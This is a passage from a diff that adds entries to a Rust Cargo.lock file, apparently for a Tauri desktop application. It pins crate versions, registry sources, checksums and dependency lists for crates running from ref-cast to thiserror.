+checksum = "f354300ae66f76f1c85c5f84693f0ce81d747e2c3f21a45fef496d89c960bf7d"
+dependencies = [
+ "ref-cast-impl",
+]
+
+[[package]]
+name = "ref-cast-impl"
+version = "1.0.25"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b7186006dcb21920990093f30e3dea63b7d6e977bf1256be20c3563a5db070da"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "regex"
+version = "1.12.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e10754a14b9137dd7b1e3e5b0493cc9171fdd105e0ab477f51b72e7f3ac0e276"
+dependencies = [
+ "aho-corasick",
+ "memchr",
+ "regex-automata",
+ "regex-syntax",
+]
+
+[[package]]
+name = "regex-automata"
+version = "0.4.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6e1dd4122fc1595e8162618945476892eefca7b88c52820e74af6262213cae8f"
+dependencies = [
+ "aho-corasick",
+ "memchr",
+ "regex-syntax",
+]
+
+[[package]]
+name = "regex-syntax"
+version = "0.8.10"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dc897dd8d9e8bd1ed8cdad82b5966c3e0ecae09fb1907d58efaa013543185d0a"
+
+[[package]]
+name = "reqwest"
+version = "0.12.28"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "eddd3ca559203180a307f12d114c268abf583f59b03cb906fd0b3ff8646c1147"
+dependencies = [
+ "base64 0.22.1",
+ "bytes",
+ "cookie",
+ "cookie_store",
+ "futures-core",
+ "http",
+ "http-body",
+ "http-body-util",
+ "hyper",
+ "hyper-rustls",
+ "hyper-util",
+ "js-sys",
+ "log",
+ "percent-encoding",
+ "pin-project-lite",
+ "quinn",
+ "rustls",
+ "rustls-pki-types",
+ "serde",
+ "serde_json",
+ "serde_urlencoded",
+ "sync_wrapper",
+ "tokio",
+ "tokio-rustls",
+ "tower",
+ "tower-http",
+ "tower-service",
+ "url",
+ "wasm-bindgen",
+ "wasm-bindgen-futures",
+ "web-sys",
+ "webpki-roots",
+]
+
+[[package]]
+name = "reqwest"
+version = "0.13.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ab3f43e3283ab1488b624b44b0e988d0acea0b3214e694730a055cb6b2efa801"
+dependencies = [
+ "base64 0.22.1",
+ "bytes",
+ "futures-core",
+ "futures-util",
+ "http",
+ "http-body",
+ "http-body-util",
+ "hyper",
+ "hyper-util",
+ "js-sys",
+ "log",
+ "percent-encoding",
+ "pin-project-lite",
+ "serde",
+ "serde_json",
+ "sync_wrapper",
+ "tokio",
+ "tokio-util",
+ "tower",
+ "tower-http",
+ "tower-service",
+ "url",
+ "wasm-bindgen",
+ "wasm-bindgen-futures",
+ "wasm-streams",
+ "web-sys",
+]
+
+[[package]]
+name = "resolv-conf"
+version = "0.7.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e061d1b48cb8d38042de4ae0a7a6401009d6143dc80d2e2d6f31f0bdd6470c7"
+
+[[package]]
+name = "ring"
+version = "0.17.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a4689e6c2294d81e88dc6261c768b63bc4fcdb852be6d1352498b114f61383b7"
+dependencies = [
+ "cc",
+ "cfg-if",
+ "getrandom 0.2.17",
+ "libc",
+ "untrusted",
+ "windows-sys 0.52.0",
+]
+
+[[package]]
+name = "rustc-hash"
+version = "2.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "94300abf3f1ae2e2b8ffb7b58043de3d399c73fa6f4b73826402a5c457614dbe"
+
+[[package]]
+name = "rustc_version"
+version = "0.4.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cfcb3a22ef46e85b45de6ee7e79d063319ebb6594faafcf1c225ea92ab6e9b92"
+dependencies = [
+ "semver",
+]
+
+[[package]]
+name = "rusticata-macros"
+version = "4.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "faf0c4a6ece9950b9abdb62b1cfcf2a68b3b67a10ba445b3bb85be2a293d0632"
+dependencies = [
+ "nom",
+]
+
+[[package]]
+name = "rustix"
+version = "1.1.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b6fe4565b9518b83ef4f91bb47ce29620ca828bd32cb7e408f0062e9930ba190"
+dependencies = [
+ "bitflags 2.11.1",
+ "errno",
+ "libc",
+ "linux-raw-sys",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "rustls"
+version = "0.23.38"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "69f9466fb2c14ea04357e91413efb882e2a6d4a406e625449bc0a5d360d53a21"
+dependencies = [
+ "once_cell",
+ "ring",
+ "rustls-pki-types",
+ "rustls-webpki",
+ "subtle",
+ "zeroize",
+]
+
+[[package]]
+name = "rustls-pki-types"
+version = "1.14.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "be040f8b0a225e40375822a563fa9524378b9d63112f53e19ffff34df5d33fdd"
+dependencies = [
+ "web-time",
+ "zeroize",
+]
+
+[[package]]
+name = "rustls-webpki"
+version = "0.103.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8279bb85272c9f10811ae6a6c547ff594d6a7f3c6c6b02ee9726d1d0dcfcdd06"
+dependencies = [
+ "ring",
+ "rustls-pki-types",
+ "untrusted",
+]
+
+[[package]]
+name = "rustversion"
+version = "1.0.22"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d"
+
+[[package]]
+name = "ryu"
+version = "1.0.23"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9774ba4a74de5f7b1c1451ed6cd5285a32eddb5cccb8cc655a4e50009e06477f"
+
+[[package]]
+name = "same-file"
+version = "1.0.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502"
+dependencies = [
+ "winapi-util",
+]
+
+[[package]]
+name = "schemars"
+version = "0.8.22"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3fbf2ae1b8bc8e02df939598064d22402220cd5bbcca1c76f7d6a310974d5615"
+dependencies = [
+ "dyn-clone",
+ "indexmap 1.9.3",
+ "schemars_derive",
+ "serde",
+ "serde_json",
+ "url",
+ "uuid",
+]
+
+[[package]]
+name = "schemars"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4cd191f9397d57d581cddd31014772520aa448f65ef991055d7f61582c65165f"
+dependencies = [
+ "dyn-clone",
+ "ref-cast",
+ "serde",
+ "serde_json",
+]
+
+[[package]]
+name = "schemars"
+version = "1.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a2b42f36aa1cd011945615b92222f6bf73c599a102a300334cd7f8dbeec726cc"
+dependencies = [
+ "dyn-clone",
+ "ref-cast",
+ "serde",
+ "serde_json",
+]
+
+[[package]]
+name = "schemars_derive"
+version = "0.8.22"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32e265784ad618884abaea0600a9adf15393368d840e0222d101a072f3f7534d"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "serde_derive_internals",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "scopeguard"
+version = "1.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49"
+
+[[package]]
+name = "selectors"
+version = "0.24.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0c37578180969d00692904465fb7f6b3d50b9a2b952b87c23d0e2e5cb5013416"
+dependencies = [
+ "bitflags 1.3.2",
+ "cssparser 0.29.6",
+ "derive_more 0.99.20",
+ "fxhash",
+ "log",
+ "phf 0.8.0",
+ "phf_codegen 0.8.0",
+ "precomputed-hash",
+ "servo_arc 0.2.0",
+ "smallvec",
+]
+
+[[package]]
+name = "selectors"
+version = "0.36.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c5d9c0c92a92d33f08817311cf3f2c29a3538a8240e94a6a3c622ce652d7e00c"
+dependencies = [
+ "bitflags 2.11.1",
+ "cssparser 0.36.0",
+ "derive_more 2.1.1",
+ "log",
+ "new_debug_unreachable",
+ "phf 0.13.1",
+ "phf_codegen 0.13.1",
+ "precomputed-hash",
+ "rustc-hash",
+ "servo_arc 0.4.3",
+ "smallvec",
+]
+
+[[package]]
+name = "semver"
+version = "1.0.28"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8a7852d02fc848982e0c167ef163aaff9cd91dc640ba85e263cb1ce46fae51cd"
+dependencies = [
+ "serde",
+ "serde_core",
+]
+
+[[package]]
+name = "serde"
+version = "1.0.228"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e"
+dependencies = [
+ "serde_core",
+ "serde_derive",
+]
+
+[[package]]
+name = "serde-untagged"
+version = "0.1.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f9faf48a4a2d2693be24c6289dbe26552776eb7737074e6722891fadbe6c5058"
+dependencies = [
+ "erased-serde",
+ "serde",
+ "serde_core",
+ "typeid",
+]
+
+[[package]]
+name = "serde_core"
+version = "1.0.228"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad"
+dependencies = [
+ "serde_derive",
+]
+
+[[package]]
+name = "serde_derive"
+version = "1.0.228"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "serde_derive_internals"
+version = "0.29.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "18d26a20a969b9e3fdf2fc2d9f21eda6c40e2de84c9408bb5d3b05d499aae711"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "serde_json"
+version = "1.0.149"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86"
+dependencies = [
+ "itoa",
+ "memchr",
+ "serde",
+ "serde_core",
+ "zmij",
+]
+
+[[package]]
+name = "serde_repr"
+version = "0.1.20"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "175ee3e80ae9982737ca543e96133087cbd9a485eecc3bc4de9c1a37b47ea59c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "serde_spanned"
+version = "0.6.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bf41e0cfaf7226dca15e8197172c295a782857fcb97fad1808a166870dee75a3"
+dependencies = [
+ "serde",
+]
+
+[[package]]
+name = "serde_spanned"
+version = "1.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6662b5879511e06e8999a8a235d848113e942c9124f211511b16466ee2995f26"
+dependencies = [
+ "serde_core",
+]
+
+[[package]]
+name = "serde_urlencoded"
+version = "0.7.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d3491c14715ca2294c4d6a88f15e84739788c1d030eed8c110436aafdaa2f3fd"
+dependencies = [
+ "form_urlencoded",
+ "itoa",
+ "ryu",
+ "serde",
+]
+
+[[package]]
+name = "serde_with"
+version = "3.18.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dd5414fad8e6907dbdd5bc441a50ae8d6e26151a03b1de04d89a5576de61d01f"
+dependencies = [
+ "base64 0.22.1",
+ "chrono",
+ "hex",
+ "indexmap 1.9.3",
+ "indexmap 2.14.0",
+ "schemars 0.9.0",
+ "schemars 1.2.1",
+ "serde_core",
+ "serde_json",
+ "serde_with_macros",
+ "time",
+]
+
+[[package]]
+name = "serde_with_macros"
+version = "3.18.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d3db8978e608f1fe7357e211969fd9abdcae80bac1ba7a3369bb7eb6b404eb65"
+dependencies = [
+ "darling 0.23.0",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "serde_yaml"
+version = "0.9.34+deprecated"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6a8b1a1a2ebf674015cc02edccce75287f1a0130d394307b36743c2f5d504b47"
+dependencies = [
+ "indexmap 2.14.0",
+ "itoa",
+ "ryu",
+ "serde",
+ "unsafe-libyaml",
+]
+
+[[package]]
+name = "serialize-to-javascript"
+version = "0.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "04f3666a07a197cdb77cdf306c32be9b7f598d7060d50cfd4d5aa04bfd92f6c5"
+dependencies = [
+ "serde",
+ "serde_json",
+ "serialize-to-javascript-impl",
+]
+
+[[package]]
+name = "serialize-to-javascript-impl"
+version = "0.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "772ee033c0916d670af7860b6e1ef7d658a4629a6d0b4c8c3e67f09b3765b75d"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "servo_arc"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d52aa42f8fdf0fed91e5ce7f23d8138441002fa31dca008acf47e6fd4721f741"
+dependencies = [
+ "nodrop",
+ "stable_deref_trait",
+]
+
+[[package]]
+name = "servo_arc"
+version = "0.4.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "170fb83ab34de17dc69aa7c67482b22218ddb85da56546f9bd6b929e32a05930"
+dependencies = [
+ "stable_deref_trait",
+]
+
+[[package]]
+name = "sha2"
+version = "0.10.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283"
+dependencies = [
+ "cfg-if",
+ "cpufeatures",
+ "digest",
+]
+
+[[package]]
+name = "shlex"
+version = "1.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64"
+
+[[package]]
+name = "signal-hook-registry"
+version = "1.4.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c4db69cba1110affc0e9f7bcd48bbf87b3f4fc7c61fc9155afd4c469eb3d6c1b"
+dependencies = [
+ "errno",
+ "libc",
+]
+
+[[package]]
+name = "simd-adler32"
+version = "0.3.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "703d5c7ef118737c72f1af64ad2f6f8c5e1921f818cdcb97b8fe6fc69bf66214"
+
+[[package]]
+name = "siphasher"
+version = "0.3.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "38b58827f4464d87d377d175e90bf58eb00fd8716ff0a62f80356b5e61555d0d"
+
+[[package]]
+name = "siphasher"
+version = "1.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e"
+
+[[package]]
+name = "slab"
+version = "0.4.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0c790de23124f9ab44544d7ac05d60440adc586479ce501c1d6d7da3cd8c9cf5"
+
+[[package]]
+name = "smallvec"
+version = "1.15.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "67b1b7a3b5fe4f1376887184045fcf45c69e92af734b7aaddc05fb777b6fbd03"
+
+[[package]]
+name = "socket2"
+version = "0.6.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3a766e1110788c36f4fa1c2b71b387a7815aa65f88ce0229841826633d93723e"
+dependencies = [
+ "libc",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "softbuffer"
+version = "0.4.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "aac18da81ebbf05109ab275b157c22a653bb3c12cf884450179942f81bcbf6c3"
+dependencies = [
+ "bytemuck",
+ "js-sys",
+ "ndk",
+ "objc2",
+ "objc2-core-foundation",
+ "objc2-core-graphics",
+ "objc2-foundation",
+ "objc2-quartz-core",
+ "raw-window-handle",
+ "redox_syscall",
+ "tracing",
+ "wasm-bindgen",
+ "web-sys",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "soup3"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "471f924a40f31251afc77450e781cb26d55c0b650842efafc9c6cbd2f7cc4f9f"
+dependencies = [
+ "futures-channel",
+ "gio",
+ "glib",
+ "libc",
+ "soup3-sys",
+]
+
+[[package]]
+name = "soup3-sys"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7ebe8950a680a12f24f15ebe1bf70db7af98ad242d9db43596ad3108aab86c27"
+dependencies = [
+ "gio-sys",
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "system-deps",
+]
+
+[[package]]
+name = "stable_deref_trait"
+version = "1.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6ce2be8dc25455e1f91df71bfa12ad37d7af1092ae736f3a6cd0e37bc7810596"
+
+[[package]]
+name = "string_cache"
+version = "0.8.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bf776ba3fa74f83bf4b63c3dcbbf82173db2632ed8452cb2d891d33f459de70f"
+dependencies = [
+ "new_debug_unreachable",
+ "parking_lot",
+ "phf_shared 0.11.3",
+ "precomputed-hash",
+ "serde",
+]
+
+[[package]]
+name = "string_cache"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a18596f8c785a729f2819c0f6a7eae6ebeebdfffbfe4214ae6b087f690e31901"
+dependencies = [
+ "new_debug_unreachable",
+ "parking_lot",
+ "phf_shared 0.13.1",
+ "precomputed-hash",
+]
+
+[[package]]
+name = "string_cache_codegen"
+version = "0.5.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c711928715f1fe0fe509c53b43e993a9a557babc2d0a3567d0a3006f1ac931a0"
+dependencies = [
+ "phf_generator 0.11.3",
+ "phf_shared 0.11.3",
+ "proc-macro2",
+ "quote",
+]
+
+[[package]]
+name = "string_cache_codegen"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "585635e46db231059f76c5849798146164652513eb9e8ab2685939dd90f29b69"
+dependencies = [
+ "phf_generator 0.13.1",
+ "phf_shared 0.13.1",
+ "proc-macro2",
+ "quote",
+]
+
+[[package]]
+name = "strsim"
+version = "0.11.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7da8b5736845d9f2fcb837ea5d9e2628564b3b043a70948a3f0b778838c5fb4f"
+
+[[package]]
+name = "subtle"
+version = "2.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "13c2bddecc57b384dee18652358fb23172facb8a2c51ccc10d74c157bdea3292"
+
+[[package]]
+name = "swift-rs"
+version = "1.0.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4057c98e2e852d51fdcfca832aac7b571f6b351ad159f9eda5db1655f8d0c4d7"
+dependencies = [
+ "base64 0.21.7",
+ "serde",
+ "serde_json",
+]
+
+[[package]]
+name = "syn"
+version = "1.0.109"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "72b64191b275b66ffe2469e8af2c1cfe3bafa67b529ead792a6d0160888b4237"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "unicode-ident",
+]
+
+[[package]]
+name = "syn"
+version = "2.0.117"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e665b8803e7b1d2a727f4023456bbbbe74da67099c585258af0ad9c5013b9b99"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "unicode-ident",
+]
+
+[[package]]
+name = "sync_wrapper"
+version = "1.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0bf256ce5efdfa370213c1dabab5935a12e49f2c58d15e9eac2870d3b4f27263"
+dependencies = [
+ "futures-core",
+]
+
+[[package]]
+name = "synstructure"
+version = "0.13.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "728a70f3dbaf5bab7f0c4b1ac8d7ae5ea60a4b5549c8a5914361c99147a709d2"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "system-deps"
+version = "6.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a3e535eb8dded36d55ec13eddacd30dec501792ff23a0b1682c38601b8cf2349"
+dependencies = [
+ "cfg-expr",
+ "heck 0.5.0",
+ "pkg-config",
+ "toml 0.8.2",
+ "version-compare",
+]
+
+[[package]]
+name = "tao"
+version = "0.34.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9103edf55f2da3c82aea4c7fab7c4241032bfeea0e71fa557d98e00e7ce7cc20"
+dependencies = [
+ "bitflags 2.11.1",
+ "block2",
+ "core-foundation",
+ "core-graphics",
+ "crossbeam-channel",
+ "dispatch2",
+ "dlopen2",
+ "dpi",
+ "gdkwayland-sys",
+ "gdkx11-sys",
+ "gtk",
+ "jni",
+ "libc",
+ "log",
+ "ndk",
+ "ndk-context",
+ "ndk-sys",
+ "objc2",
+ "objc2-app-kit",
+ "objc2-foundation",
+ "once_cell",
+ "parking_lot",
+ "raw-window-handle",
+ "tao-macros",
+ "unicode-segmentation",
+ "url",
+ "windows",
+ "windows-core 0.61.2",
+ "windows-version",
+ "x11-dl",
+]
+
+[[package]]
+name = "tao-macros"
+version = "0.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f4e16beb8b2ac17db28eab8bca40e62dbfbb34c0fcdc6d9826b11b7b5d047dfd"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "target-lexicon"
+version = "0.12.16"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "61c41af27dd6d1e27b1b16b489db798443478cef1f06a660c96db617ba5de3b1"
+
+[[package]]
+name = "tauri"
+version = "2.10.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "da77cc00fb9028caf5b5d4650f75e31f1ef3693459dfca7f7e506d1ecef0ba2d"
+dependencies = [
+ "anyhow",
+ "bytes",
+ "cookie",
+ "dirs",
+ "dunce",
+ "embed_plist",
+ "getrandom 0.3.4",
+ "glob",
+ "gtk",
+ "heck 0.5.0",
+ "http",
+ "jni",
+ "libc",
+ "log",
+ "mime",
+ "muda",
+ "objc2",
+ "objc2-app-kit",
+ "objc2-foundation",
+ "objc2-ui-kit",
+ "objc2-web-kit",
+ "percent-encoding",
+ "plist",
+ "raw-window-handle",
+ "reqwest 0.13.2",
+ "serde",
+ "serde_json",
+ "serde_repr",
+ "serialize-to-javascript",
+ "swift-rs",
+ "tauri-build",
+ "tauri-macros",
+ "tauri-runtime",
+ "tauri-runtime-wry",
+ "tauri-utils",
+ "thiserror 2.0.18",
+ "tokio",
+ "tray-icon",
+ "url",
+ "webkit2gtk",
+ "webview2-com",
+ "window-vibrancy",
+ "windows",
+]
+
+[[package]]
+name = "tauri-build"
+version = "2.5.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4bbc990d1dbf57a8e1c7fa2327f2a614d8b757805603c1b9ba5c81bade09fd4d"
+dependencies = [
+ "anyhow",
+ "cargo_toml",
+ "dirs",
+ "glob",
+ "heck 0.5.0",
+ "json-patch",
+ "schemars 0.8.22",
+ "semver",
+ "serde",
+ "serde_json",
+ "tauri-utils",
+ "tauri-winres",
+ "toml 0.9.12+spec-1.1.0",
+ "walkdir",
+]
+
+[[package]]
+name = "tauri-codegen"
+version = "2.5.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d4a24476afd977c5d5d169f72425868613d82747916dd29e0a357c84c4bd6d29"
+dependencies = [
+ "base64 0.22.1",
+ "brotli",
+ "ico",
+ "json-patch",
+ "plist",
+ "png",
+ "proc-macro2",
+ "quote",
+ "semver",
+ "serde",
+ "serde_json",
+ "sha2",
+ "syn 2.0.117",
+ "tauri-utils",
+ "thiserror 2.0.18",
+ "time",
+ "url",
+ "uuid",
+ "walkdir",
+]
+
+[[package]]
+name = "tauri-macros"
+version = "2.5.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d39b349a98dadaffebb73f0a40dcd1f23c999211e5a2e744403db384d0c33de7"
+dependencies = [
+ "heck 0.5.0",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "tauri-codegen",
+ "tauri-utils",
+]
+
+[[package]]
+name = "tauri-plugin"
+version = "2.5.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ddde7d51c907b940fb573006cdda9a642d6a7c8153657e88f8a5c3c9290cd4aa"
+dependencies = [
+ "anyhow",
+ "glob",
+ "plist",
+ "schemars 0.8.22",
+ "serde",
+ "serde_json",
+ "tauri-utils",
+ "toml 0.9.12+spec-1.1.0",
+ "walkdir",
+]
+
+[[package]]
+name = "tauri-plugin-opener"
+version = "2.5.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc624469b06f59f5a29f874bbc61a2ed737c0f9c23ef09855a292c389c42e83f"
+dependencies = [
+ "dunce",
+ "glob",
+ "objc2-app-kit",
+ "objc2-foundation",
+ "open",
+ "schemars 0.8.22",
+ "serde",
+ "serde_json",
+ "tauri",
+ "tauri-plugin",
+ "thiserror 2.0.18",
+ "url",
+ "windows",
+ "zbus",
+]
+
+[[package]]
+name = "tauri-runtime"
+version = "2.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2826d79a3297ed08cd6ea7f412644ef58e32969504bc4fbd8d7dbeabc4445ea2"
+dependencies = [
+ "cookie",
+ "dpi",
+ "gtk",
+ "http",
+ "jni",
+ "objc2",
+ "objc2-ui-kit",
+ "objc2-web-kit",
+ "raw-window-handle",
+ "serde",
+ "serde_json",
+ "tauri-utils",
+ "thiserror 2.0.18",
+ "url",
+ "webkit2gtk",
+ "webview2-com",
+ "windows",
+]
+
+[[package]]
+name = "tauri-runtime-wry"
+version = "2.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e11ea2e6f801d275fdd890d6c9603736012742a1c33b96d0db788c9cdebf7f9e"
+dependencies = [
+ "gtk",
+ "http",
+ "jni",
+ "log",
+ "objc2",
+ "objc2-app-kit",
+ "once_cell",
+ "percent-encoding",
+ "raw-window-handle",
+ "softbuffer",
+ "tao",
+ "tauri-runtime",
+ "tauri-utils",
+ "url",
+ "webkit2gtk",
+ "webview2-com",
+ "windows",
+ "wry",
+]
+
+[[package]]
+name = "tauri-utils"
+version = "2.8.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "219a1f983a2af3653f75b5747f76733b0da7ff03069c7a41901a5eb3ace4557d"
+dependencies = [
+ "anyhow",
+ "brotli",
+ "cargo_metadata",
+ "ctor",
+ "dunce",
+ "glob",
+ "html5ever 0.29.1",
+ "http",
+ "infer",
+ "json-patch",
+ "kuchikiki",
+ "log",
+ "memchr",
+ "phf 0.11.3",
+ "proc-macro2",
+ "quote",
+ "regex",
+ "schemars 0.8.22",
+ "semver",
+ "serde",
+ "serde-untagged",
+ "serde_json",
+ "serde_with",
+ "swift-rs",
+ "thiserror 2.0.18",
+ "toml 0.9.12+spec-1.1.0",
+ "url",
+ "urlpattern",
+ "uuid",
+ "walkdir",
+]
+
+[[package]]
+name = "tauri-winres"
+version = "0.3.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1087b111fe2b005e42dbdc1990fc18593234238d47453b0c99b7de1c9ab2c1e0"
+dependencies = [
+ "dunce",
+ "embed-resource",
+ "toml 0.9.12+spec-1.1.0",
+]
+
+[[package]]
+name = "tempfile"
+version = "3.27.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd"
+dependencies = [
+ "fastrand",
+ "getrandom 0.4.2",
+ "once_cell",
+ "rustix",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "tendril"
+version = "0.4.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d24a120c5fc464a3458240ee02c299ebcb9d67b5249c8848b09d639dca8d7bb0"
+dependencies = [
+ "futf",
+ "mac",
+ "utf-8",
+]
+
+[[package]]
+name = "tendril"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c4790fc369d5a530f4b544b094e31388b9b3a37c0f4652ade4505945f5660d24"
+dependencies = [
+ "new_debug_unreachable",
+ "utf-8",
+]
+
+[[package]]
+name = "thiserror"
+version = "1.0.69"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b6aaf5339b578ea85b50e080feb250a3e8ae8cfcdff9a461c9ec2904bc923f52"
+dependencies = [
+ "thiserror-impl 1.0.69",
+]
+
+[[package]]
+name = "thiserror"
+version = "2.0.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4288b5bcbc7920c07a1149a35cf9590a2aa808e0bc1eafaade0b80947865fbc4"
+dependencies = [
+ "thiserror-impl 2.0.18",
+]
+
+[[package]]
+name = "thiserror-impl"
